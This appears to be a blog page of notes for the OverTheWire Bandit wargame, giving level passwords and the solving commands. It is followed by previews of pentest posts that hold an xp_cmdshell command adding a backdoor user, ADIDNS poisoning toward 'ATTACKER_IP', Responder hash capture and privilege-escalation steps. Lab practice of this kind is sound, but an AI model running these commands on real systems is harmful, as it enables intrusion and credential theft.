Skip to main content

Bandit CTF

Bandit CTF

ssh bandit7@bandit.labs.overthewire.org -p 2220

3 - UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK
4 - pIwrPrtPN36QITSp3EQaw936yaFoFgAB
5 - koReBOKuIDDepwhWk7jZC0RTdopnAYKh
6 - DXjZPULLxYr17uwoI01bNLQbtFemEgo7
7 - HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs /--> find / -size 33c -user bandit7 -group bandit6 2>/dev/null -->  cat /var/lib/dpkg/info/bandit7.password
8 - cvX2JJa4CFALtqS87jk27qwqGhBM9plV /--> grep "millionth" data.txt
9 - UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR /--> cat data.txt | sort | uniq -c | grep 1 / unique value
10 -truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk /--> strings data.txt | grep "==" /search for something with req text
11- IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR
12- 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu /--> cat data.txt | tr a-zA-Z n-za-mN-ZA-M /find rot13 text
13- 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL
14- 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e / ssh -i sshkey.private bandit14@localhost
15- BfMYroe26WYalil77FoDi9qh59eK5xNr /echo 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e | nc localhost 30000
16- cluFn7wTiGryunymYOu4RcffSxQluehd /echo BfMYroe26WYalil77FoDi9qh59eK5xNr | openssl s_client -quiet -connect localhost:30001
17- xLYVMN9WE5zQ5vHacb0sZEVqbrp7nBTn /--> cat /etc/bandit_pass/bandit16 | openssl s_client -quiet -connect localhost:31790 -quiet >/tmp/key/key.private
    chmod 700 key.private --> ssh -i key.private bandit17@localhost --> cat /etc/bandit_pass/bandit17
18- kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd    /--> awk 'NR==FNR{a[$0];next}!($0 in a)' passwords.new passwords.old --> diff b/w 2 lines
    diff passwords.new passwords.old
    grep -vf passwords.old passwords.new
19- IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x /--> ssh bandit18@bandit.labs.overthewire.org -p 2220 cat readme
20-GbKksEFF4yrVs6il55v6gwY5aVje5f0j /-->  ./bandit20-do cat /etc/bandit_pass/bandit20




ougahZi8Ta

Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Relay Attacks

Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/